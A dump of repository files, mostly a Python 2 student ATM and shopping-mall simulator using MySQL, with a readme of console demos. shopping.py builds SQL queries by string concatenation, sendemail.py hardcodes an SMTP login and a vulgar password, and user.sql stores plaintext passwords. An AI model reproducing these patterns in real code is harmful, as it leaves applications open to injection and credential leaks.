d.writeByte(s[0].toInt())\n d.writeByte(0)\n d.writeByte(0x81)\n }\n 2 -> {\n d.writeByte(s[0].toInt())\n d.writeByte(s[1].toInt())\n d.writeByte(0x82)\n }\n 3 -> {\n d.writeByte(s[0].toInt())\n d.writeByte(s[1].toInt())\n d.writeByte(s[2].toInt())\n }\n else -> {\n d.writeShort(stringsBank.indexOf(s))\n d.writeByte(0x80 or s.length)\n }\n }\n }\n m[blockNum] = out.toByteArray()\n }\n return m\n }\n}" }, { "alpha_fraction": 0.3396226465702057, "alphanum_fraction": 0.3396226465702057, "avg_line_length": 53, "blob_id": "67016db3ed38d34d866212e223d85dbfbe334456", "content_id": "c3bafab6feb5e74097c1fefef1b3860b9ec3657a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 53, "license_type": "permissive", "max_line_length": 53, "num_lines": 1, "path": "/php/_data/_2d0.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLi');" } ]
30
zhulh200868/day05
https://github.com/zhulh200868/day05
cf93df169eacce37adb1078e60284a73b1ba239e
76daf5fe1f322fe9396415fb18ca228d7b7a56c5
2636f33e55c63feb2ec81ac6f06dacf8290d86d6
refs/heads/master
2016-06-03T01:59:50.348943
2016-02-26T05:47:20
2016-02-26T05:47:20
52,581,728
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.27695024013519287, "alphanum_fraction": 0.32081249356269836, "avg_line_length": 33.665306091308594, "blob_id": "8d8ffedcb7c7cc65e85207e2704a9c8cff8c51f7", "content_id": "fedd7bbac7c10ce0ca3b1b4946c9ec5d9dcedb1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 23607, "license_type": "no_license", "max_line_length": 108, "num_lines": 490, "path": "/readme.txt", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "本节作业day05\n##本程序基于python 2.7和Linux开发,需运行在python2.x和linux系统环境下###\n\n作业需求:\n模拟实现一个ATM + 购物商城程序\n\n额度 15000或自定义\n实现购物商城,买东西加入 购物车,调用信用卡接口结账\n可以提现,手续费5%\n每月22号出账单,每月10号为还款日,过期未还,按欠款总额 万分之5 每日计息\n支持多账户登录\n支持账户间转账\n记录每月日常消费流水\n提供还款接口\nATM记录操作日志\n提供管理接口,包括添加账户、用户额度,冻结账户等。。。\n账号、密码、信用卡额度、余额都存储在mysql下python库中的user表中。\n并将购物、还款信息记录到log.txt文件中\n\n\n-----------程序执行前提条件:\n 需要安装程序mysqlserver,python的MySQL模块,并使用user.sql创建数据库和表,以及插入一些初始化数据。\n 需要修改setting.py文件中连接mysql的参数。\nuser表字段说明:\n`name` ----信用卡账号\n`password` ----密码\n`salary` ----信用卡额度\n`money` ----信用卡余额\n`status` ----信用卡是否冻结状态\n`lock_time` ----信用卡锁定时间\n`interest` ----利息\n`str_interest` ----是否计息标志\n\n-----------程序结构说明:\n[root@master day05]# tree\n|-- apis\n| |-- Caltimes.py\t\t\t\t\t\t ----时间换算程序\n| |-- logger.py\t\t\t\t\t\t\t----日志记录程序\n| |-- mysql.py\t\t\t\t\t\t\t----操作mysql的程序\n| |-- passwd_getpass.py\t\t\t ----将输入的密码转换成星号*程序\n| |-- sendemail.py\t\t\t\t\t ----email发送程序\n| |-- tab.py\t\t\t\t\t\t\t\t----tab补全功能程序\n|-- auto_calc.py\t\t\t\t\t\t\t----出账单和计息程序,一个后台进程\n|-- config\n| |-- setting.py\t\t\t\t\t\t ----配置文件\n|-- core\n| |-- atm.py\t\t\t\t\t\t\t\t----atm主程序,实现提现、转账、还款\n| |-- login.py\t\t\t\t\t\t\t----登陆验证程序\n| |-- manager.py\t\t\t\t\t\t ----管理员界面程序\n| |-- register.py\t\t\t\t\t\t ----注册添加账号程序\n| |-- shopping.py\t\t\t\t\t\t ----购物商城程序\n|-- log.txt\t\t\t\t\t\t\t\t\t----日志文件\n|-- readme.txt\t\t\t\t\t\t\t\t----readme文件\n|-- user.sql ----用户初始化脚本\n`-- user_main.py\t\t\t\t\t\t\t----项目主程序入口\n\n\n-----------ATM余额显示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):echo\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为891.5\n\n-----------ATM提现:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):jack2\n请输入您的密码(退出请输入'q'):*******\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为14218.0\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 2\n请输入您需要提现的额数:500\n您提现的额数为:500元,本次提现成功,并收取25.0元的手续费!\n你现在的余额为:13693.0\n\n-----------ATM转账:\n从jack账号转500到echo账号\n\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):echo\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为366.5 ------------------这里echo账号为366.5\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 6\nGOODBye!\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):jack\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为11881 ------------------这里jack账号为11881\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 3\n请输入您想转给谁?:echo\n请输入您转账的金额:500\n本次转账成功!因为是本行内转账不收取任何手续费!\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为11381.0 ------------------这里jack账号为11381\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 6\nGOODBye!\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):echo\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为866.5 ------------------这里jack账号为866.5\n\n-----------ATM账号修改密码:\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):root2\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 5\n####################################################################################################\n 1 修改密码 2 返回上级菜单 3 退出\n\n####################################################################################################\n请您选择[1, 2, 3]: 1\n请输入您的旧密码:***\n#################您输入的密码是错误的!###################\n请输入您的旧密码:*********\n请您输入您的新密码:****\n请再次您输入您的新密码:****\n###############您两次输入的密码不一致!################\n请您输入您的新密码:********\n请再次您输入您的新密码:*******\n###############您两次输入的密码不一致!################\n请您输入您的新密码:******\n请再次您输入您的新密码:****\n###############您两次输入的密码不一致!################\n###############您输入的次数已经达到3次,请一会再修改!################\n\n\n####################################################################################################\n 1 修改密码 2 返回上级菜单 3 退出\n\n####################################################################################################\n请您选择[1, 2, 3]: 1\n请输入您的旧密码:*********\n请您输入您的新密码:**\n请再次您输入您的新密码:**\n您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\n请您输入您的新密码:******\n请再次您输入您的新密码:******\n您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\n请您输入您的新密码:********\n请再次您输入您的新密码:********\n您修改的密码已经成功!\n\n-----------购物商城演示:\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:2\n首先您需要输入您的账号(退出请输入'q'):root2\n请输入您的密码(退出请输入'q'):********\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 1\n您可以选择购买别的商品!因为目前您的信用卡余额不能支付该商品!\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 4\n您已经购买了 T-shirt,您的余额还有19550\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 2\n您已经购买了 Iphone,您的余额还有14951\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 8\n您本次购物的商品有:['T-shirt', 'Iphone']\nGOODBye!\n-----------用户申请信用卡演示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:3\n现在开始进行信用卡申请流程!\n请输入账号名:dfjal;f\n请您输入您的密码:******\n请再次您输入您的密码:******\n您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\n请您输入您的密码:*****\n请再次您输入您的密码:****\n###############您两次输入的密码不一致!################\n请您输入您的密码:*******\n请再次您输入您的密码:****\n###############您两次输入的密码不一致!################\n请您输入您的密码:*****\n请再次您输入您的密码:****\n###############您两次输入的密码不一致!################\n################你申请账号失败!###############\n\n\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:3\n现在开始进行信用卡申请流程!\n请输入账号名:root2\n请您输入您的密码:*********\n请再次您输入您的密码:*********\n您创建密码已经成功!并且您的信用卡已经申请成功,限额为20000\n\n-----------管理员界面添加账号演示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:4\n首先您需要输入您的账号(退出请输入'q'):root\n请输入您的密码(退出请输入'q'):\n############################## 欢迎您登陆管理员界面! ##############################\n######################################################################################\n\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n请输入账号名:root2\n请您输入您的密码:*********\n请再次您输入您的密码:*********\n您创建密码已经成功!并且您的信用卡已经申请成功,限额为50000\n\n-----------管理员界面用户额度调整演示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:4\n首先您需要输入您的账号(退出请输入'q'):root\n请输入您的密码(退出请输入'q'):\n############################## 欢迎您登陆管理员界面! ##############################\n######################################################################################\n\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n\n如果你退出请按'5'!\n请输入您想要的选项:2\n请输入您想要调整额度的账号:root2\n目前root2账号的额度为:50000\n请输入您想要调整额度:dfaj;d\n您输入的金额有误,请重新输入!\n请输入您想要调整额度的账号:root4\n您输入的账号不存在!\n请输入您想要调整额度的账号:root2\n目前root2账号的额度为:50000\n请输入您想要调整额度:60000\n您调整的额度已成功!\n\n-----------管理员界面用户账号冻结演示:\n############################## 欢迎您登陆管理员界面! ##############################\n######################################################################################\n\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n\n如果你退出请按'5'!\n请输入您想要的选项:3\n请输入您想要冻结的账号:jackss\n您已经将jackss账号冻结10分钟!\n\n-----------log.txt内容演示:\n日期\t\t用户\t\t动作\t\t事务\t\t价格\t\t余额\n2016-02-24 21:00:19\troot\trepay_money\t----\t+1000\t1308\n2016-02-24 21:17:13\tjackss\trepay_money\t----\t+1000\t1352\n2016-02-24 21:25:44\troot\trepay_money\t----\t+500\t1808\n\n-----------出账单演示:\n[root@master day05]# ps -ef|grep auto|grep -v grep|grep -v mount\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:5\nGOODBye!\n[root@master day05]# ps -ef|grep auto|grep -v grep|grep -v mount\nroot 12341 1 4 13:30 pts/0 00:00:00 /usr/local/python2.7/bin/python /root/s12/day05/auto_calc.py\n\n-----------邮件账单信息:\ndate name act business price balance\n2016-02-24 21:00:19 root repay_money ---- +1000 1308\n2016-02-24 21:25:44 root repay_money ---- +500 1808" }, { "alpha_fraction": 0.5194552540779114, "alphanum_fraction": 0.6459143757820129, "avg_line_length": 31.0625, "blob_id": "ff17b4c109a6708ae81ec2afa498ebb48568e23a", "content_id": "1bbe7abc4e03448c4ea69b82c44fe56f370b1219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/apis/Caltimes.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding=utf-8 -*-\n\nimport time,datetime\n\ndef Caltime(date1,date2):\n date1=time.strptime(date1,\"%Y-%m-%d %H:%M:%S\")\n date2=time.strptime(date2,\"%Y-%m-%d %H:%M:%S\")\n date1=datetime.datetime(date1[0],date1[1],date1[2],date1[3],date1[4],date1[5])\n date2=datetime.datetime(date2[0],date2[1],date2[2],date2[3],date2[4],date2[5])\n #return (date2-date1).days\n #返回两者时间的秒数\n return (date2-date1).seconds\n\n# for example\n# print Caltime('2012-08-16 01:28:33','2012-08-18 06:26:54')\n\n" }, { "alpha_fraction": 0.5649013519287109, "alphanum_fraction": 0.5846313834190369, "avg_line_length": 28.15151596069336, "blob_id": "05154a023eeb9db8308ca073e48e7bf89b6d78cd", "content_id": "2a64212e9e51e75fb6cc8b25ab66af443d2343d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1019, "license_type": "no_license", "max_line_length": 61, "num_lines": 33, "path": "/apis/sendemail.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/local/python2.7/bin/python\n# -*- coding=utf-8 -*-\n\nimport json,time,os\nimport smtplib \nfrom email.mime.text import MIMEText \nfrom email.header import Header\nimport logger\n\ndef s_email(value):\n try:\n subject = \"The credit card's bill!\"\n msg = MIMEText(_text=value, _charset='utf-8')\n msg['Subject'] = Header(subject, 'utf-8') \n #输入Email地址和口令:\n from_addr = '[email protected]'\n password = 'wocaonima!'\n # 输入SMTP服务器地址:\n smtp_server = 'smtp.v-dream.com'\n # 输入收件人地址:\n to_addr = ['[email protected]']\n \n #SMTP协议默认端口是25\n server = smtplib.SMTP(smtp_server, 25)\n server.set_debuglevel(1)\n server.login(from_addr, password)\n for i in to_addr:\n server.sendmail(from_addr, i, msg.as_string())\n server.quit()\n print 'email send success,the address is %s' %to_addr\n except Exception,e:\n print e\n print 'email send failed.' " }, { "alpha_fraction": 0.6598639488220215, "alphanum_fraction": 0.6643990874290466, "avg_line_length": 29.44827651977539, "blob_id": "6effe6dae8d5a2dbcdac719f0c673e16a876ac10", "content_id": "fdfb0bd959d22ba63333c5b4647345f937e3a39a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 946, "license_type": "no_license", "max_line_length": 193, "num_lines": 29, "path": "/apis/mysql.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nimport MySQLdb\n\n\ndef mysql(sql_cmd,sql_type,mode=1):\n\ttry:\n\t\tconn=MySQLdb.connect(host=setting.DATABASE[\"host\"],user=setting.DATABASE[\"user\"],passwd=setting.DATABASE[\"password\"],unix_socket=setting.DATABASE[\"unix_socket\"],port=setting.DATABASE[\"port\"])\n\t\tcur=conn.cursor()\n\t\tconn.select_db('python')\n\t\tcur.execute(sql_cmd)\n\t\tif sql_type == 'select' and mode == 1:\n\t\t\tresult = cur.fetchall()\n\t\t\tglobal new_line\t\t#定义全局变量new_line\n\t\t\tfor (line,) in result:\t\t#从result中取值,并把(,)去掉\n\t\t\t\tnew_line = (line)\n\t\t\treturn new_line\t\t#返回new_line的值\n\t\telif sql_type == 'select' and mode == 2:\n\t\t\tresult = cur.fetchall()\n\t\t\tnew_line = \" \"\n\t\t\tfor (line,) in result:\t\t#从result中取值,并把(,)去掉\n\t\t\t\tnew_line += (line)+\" \"\n\t\t\treturn new_line\t\t#返回new_line的值\n\t\tcur.close()\n\t\tconn.close()\n\texcept MySQLdb.Error,e:\n\t\tprint 'Mysql Error Msg: ',e" }, { "alpha_fraction": 0.42661914229393005, "alphanum_fraction": 0.4789067208766937, "avg_line_length": 43.893333435058594, "blob_id": "459e3fabe14f7a67c471e24c7bf54d163eb34e13", "content_id": "36987a3db73e9b30604286a99fdc27a7fa1b43df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3916, "license_type": "no_license", "max_line_length": 135, "num_lines": 75, "path": "/core/shopping.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom login import login\nfrom apis import mysql,logger,passwd_getpass\nimport sys\n\ndef decorate(func):\n def inner():\n is_login = login()\n if not is_login[0]:\n return None\n global names\n global passwd\n names=is_login[1]\n passwd=is_login[2]\n func()\n return inner\n\n@decorate\ndef shops():\n global shopping_cart\n shopping_cart = []\n #购物车列表\n while True:\n print 100*'#'\n print 20*' ','\tNum. Goods Money '\n print 20*' ','\t1 Car 250000\t \t '\n print 20*' ','\t2 Iphone 4599\t\t '\n print 20*' ','\t3 Mac\t 10000\t\t '\n print 20*' ','\t4 T-shirt 450\t\t '\n print 20*' ','\t5 Bicyle 1500\t\t '\n print 20*' ','\t6 Coffee 60\t\t \\n'\n print 100*'#'\n print \"\\033[35m如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\\033[0m\"\n num_list = ['1','2','3','4','5','6','7','8']\t#创建一个num的列表\n goods_list = ['Car','Iphone','Mac','T-shirt','Biycle','Coffee']\t\t#创建一个商品的列表\n rmb_list = [250000,4599,10000,450,1500,60]\t\t#创建一个价格的列表\n input_num = raw_input('\\033[31mPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: \\033[0m').strip()\t#输入想要购买商品的num\n if input_num in num_list:\t#如果输入的num存在num_list列表中,执行下面的:\n if input_num != \"7\" and input_num != \"8\":\t#如果输入的num不等于7,就执行下面的:\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查询该用户的money数\n new_money = mysql.mysql(sql_cmd,'select')\n #如果你的余额高于商品的价格就执行下面的,即购买该商品。\n if float(new_money) > int(rmb_list[num_list.index(input_num)]):\n #余额减去价格等到新的余额\n new_money = float(new_money) - int(rmb_list[num_list.index(input_num)])\n sql_cmd = \"update user set money = \" + \"'\" +str(round(new_money,2))+\"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n #将商品加入已经购买的列表\n shopping_cart.append(goods_list[num_list.index(input_num)])\n print \"\\033[34m您已经购买了 %s,您的余额还有%s\\033[0m\" % (goods_list[num_list.index(input_num)],round(new_money,2))\n price = '-' + str(rmb_list[num_list.index(input_num)])\n #将本次购物记录写入日志中\n logger.record_log(names,'buy',goods_list[num_list.index(input_num)],price,round(new_money,2))\n else:\n #当你的余额小于商品中最小的价格,就提示你无法再购物了\n if float(new_money) < min(rmb_list):\n print \"\\033[35m您已经没有足够的钱来购买东西,或者你先还款以后再购买!\\033[0m\"\n else:\n print \"\\033[35m您可以选择购买别的商品!因为目前您的信用卡余额不能支付该商品!\\033[0m\"\n elif input_num == '7':\n break\n # return shopping_cart\n elif input_num == '8':\n if len(shopping_cart) > 0:\n print \"\\033[35m您本次购物的商品有:%s\\033[0m\" %shopping_cart\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8####################\\033[0m\"\n\n\nif __name__ == \"__main__\":\n shops()" }, { "alpha_fraction": 0.5266757607460022, "alphanum_fraction": 0.5280437469482422, "avg_line_length": 30.782608032226562, "blob_id": "b382995a2ed9721e2db169fe2344ee82f3677d22", "content_id": "3c363d0f51432e1281895f18200021a5f2a8c034", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 843, "license_type": "no_license", "max_line_length": 121, "num_lines": 23, "path": "/apis/logger.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding=utf-8 -*-\n\nimport time\nimport os\n\ndef record_log(names,act,things,price,money):\n\t#日志文件名\n\tlogfile = 'log.txt'\n\t#数据插入的日期\n\tdate = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n\trecord_line = date + '\\t' + names + '\\t' + act + '\\t' + things + '\\t' + price + '\\t' + str(money) + '\\n'\n\t#判断日志文件是否存在,如果不存在就创建一个新文件,并插入单位名称\n\tif not os.path.exists(logfile):\n\t\tf = open(logfile,'w')\n\t\t#record = '日期' + '\\t\\t' + '用户' + '\\t\\t' + '动作' + '\\t\\t' + '事务' + '\\t\\t' + '价格' + '\\t\\t' + '余额' + '\\n'\n\t\trecord = 'date' + '\\t\\t' + 'name' + '\\t\\t' + 'act' + '\\t\\t' + 'business' + '\\t\\t' + 'price' + '\\t\\t' + 'balance' + '\\n'\n\t\tf.write(record)\n\t\tf.close()\n\tf = open(logfile,'a')\n\tf.write(record_line)\n\tf.flush()\n\tf.close()\n" }, { "alpha_fraction": 0.5139164924621582, "alphanum_fraction": 0.5238568782806396, "avg_line_length": 22.9761905670166, "blob_id": "04e75022283e89ee80c1d13e091aea77bae70c17", "content_id": "ed0184e1d9ece618288c0ec7427818cb3f12dfc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 60, "num_lines": 42, "path": "/apis/passwd_getpass.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nimport sys\nimport tty\nimport termios\n\ndef getch():\n #获取标准输入的描述符\n fd = sys.stdin.fileno()\n #获取标准输入(终端)的设置\n old_settings = termios.tcgetattr(fd)\n try:\n #改变输入的描述符的模式\n tty.setraw(sys.stdin.fileno())\n #获取输入的一行数据\n ch = sys.stdin.read(1)\n finally:\n #使设置生效\n termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)\n return ch\n\ndef getpass(maskchar=\"*\"):\n password = \"\"\n while True:\n #调用getch函数\n ch = getch()\n #判断是否是回车或者换行\n if ch == \"\\r\" or ch == \"\\n\":\n print\n return password\n #判断是否是退格或者字符串的数值等于127\n #ord函数是将一个字符转换为它的整数值\n elif ch == \"\\b\" or ord(ch) == 127:\n if len(password) > 0:\n sys.stdout.write(\"\\b \\b\")\n password = password[:-1]\n else:\n #如果maskchar不是None,则输出maskchar\n if maskchar != None:\n sys.stdout.write(maskchar)\n password += ch" }, { "alpha_fraction": 0.540772557258606, "alphanum_fraction": 0.6866952776908875, "avg_line_length": 42.75, "blob_id": "5aab92049113abfd92938831d6a73c2997ebd639", "content_id": "446bf5fdddc4610bdeec19bb3ac21dbaad72a332", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 699, "license_type": "no_license", "max_line_length": 100, "num_lines": 16, "path": "/user.sql", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "create database python;\nuse python;\nCREATE TABLE `user` (\n `name` varchar(20) DEFAULT NULL,\n `password` varchar(20) DEFAULT NULL,\n `salary` varchar(10) DEFAULT NULL,\n `money` varchar(10) DEFAULT NULL,\n `status` varchar(10) DEFAULT NULL,\n `lock_time` varchar(20) DEFAULT NULL,\n `interest` varchar(10) DEFAULT NULL,\n `str_interest` char(10) DEFAULT NULL\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;\n\ninsert into python.user values('root','123','15000','15000','unlock','2015-06-08 20:56:09','0','0');\ninsert into python.user values('jack','123','8000','8000','unlock','2015-06-08 20:56:09','0','0');\ninsert into python.user values('echo','123','10000','10000','unlock','2015-06-08 20:56:09','0','0');" }, { "alpha_fraction": 0.4432348310947418, "alphanum_fraction": 0.5054432153701782, "avg_line_length": 29.64285659790039, "blob_id": "6d4cdf0f55f1d108be1088d5ba39dcba59dafc31", "content_id": "575a9d19dddf3026071789bd9ed13f38cc408263", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1506, "license_type": "no_license", "max_line_length": 95, "num_lines": 42, "path": "/user_main.py", "repo_name": "zhulh200868/day05", 